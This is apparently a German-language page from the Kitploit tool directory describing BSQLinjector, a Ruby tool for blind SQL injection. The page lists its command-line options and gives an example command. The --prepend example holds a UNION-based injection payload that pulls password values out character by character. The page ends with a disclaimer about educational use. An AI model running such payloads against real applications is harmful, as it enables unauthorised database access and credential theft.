Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
BSQLinjector — Werkzeug zur Ausnutzung von Blind-SQL-Injection, geschrieben in Ruby. | Kitploit
Tools/GitHubGitHub/enjoiz/bsqlinjector
SchwachstellenanalyseWebanwendungs-ExploitationPenetrationstests
GitHubenjoiz/bsqlinjector

BSQLinjector

Werkzeug zur Ausnutzung von Blind-SQL-Injection, geschrieben in Ruby.

Repository anzeigen
10027vor 1 JahrVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

BSQLinjector

BSQLinjector verwendet die Blindmethode, um Daten aus SQL-Datenbanken abzurufen. Ich empfehle, den Schalter "--test" zu verwenden, um deutlich zu sehen, wie die konfigurierte Payload aussieht, bevor sie an eine Anwendung gesendet wird.

Optionen:

root@kitploit:~
  --file	    Mandatory - File containing valid HTTP request and SQL injection point (SQLINJECT). (--file=/tmp/req.txt)
  --pattern	    Mandatory - Pattern to look for when query is true. (--pattern=truestatement)
  --prepend	    Mandatory - Main payload. (--prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password,"
  --append	    How to end our payload. For example comment out rest of SQL statement. (--append='#)
  --schar	    Character placed around chars. This character is not used while in hex mode. (--schar="'")
  --2ndfile	    File containing valid HTTP request used in second order exploitation. (--2ndfile=/tmp/2ndreq.txt)

  --mode	    Blind mode to use - (between - b (generates less requests), moreless - a (generates less requests by using "<", ">", "=" characters), like - l (complete bruteforce), equals - e (complete bruteforce)). (--mode=l)
  --postgres        Use postgres "for" in substring function (e.g. from 1 for 1).
  --hex		    Use hex to compare instead of characters.
  --case	    Case sensitivity.

  --ssl		    Use SSL.
  --proxy	    Proxy to use. (--proxy=127.0.0.1:8080)

  --test	    Enable test mode. Do not send request, just show full payload.
  --special	    Include all special characters in enumeration.
  --start	    Start enumeration from specified character. (--start=10)
  --max		    Maximum characters to enumerate. (--max=10)
  --timeout	    Timeout in waiting for responses. (--timeout=20)
  --only-final	    Stop showing each enumerated letter.
  --comma	    Encode comma.
  --bracket	    Add brackets to the end of substring function. --bracket="))"
  --hexspace	    Use space instead of brackets to split hex values.
  --verbose	    Show verbose messages.

Beispielverwendung:

root@kitploit:~
  ruby ./BSQLinjector.rb --pattern=truestatement --file=/tmp/req.txt --schar="'" --prepend="abcd'and'a'='b'+union+select+'truestatement'+from+table+where+col%3d'value'+and+substr(password," --append="'#" --ssl

Haftungsausschluss

Dieses Repository enthält ein Tool, das ausschließlich zu Bildungszwecken entwickelt wurde. Jeglicher Missbrauch des Tools für illegale Aktivitäten ist strengstens untersagt.

Rechtlicher Hinweis

Es ist wichtig, alle örtlichen Gesetze und Vorschriften in Bezug auf Cybersicherheit und ethisches Hacking zu verstehen und einzuhalten. Unbefugter Zugriff auf Computersysteme, Netzwerke oder Daten ist illegal und strafbar. Der Entwickler dieses Repositorys ist nicht für jeglichen Missbrauch der hierin enthaltenen Tools verantwortlich.

Durch die Nutzung der Tools in diesem Repository erklären Sie sich damit einverstanden, sie verantwortungsvoll und ethisch zu verwenden. Holen Sie immer ausdrückliche Genehmigung ein, bevor Sie ein Netzwerk, System oder Daten testen oder darauf zuzugreifen versuchen, die nicht Ihnen gehören.

Tool herunterladen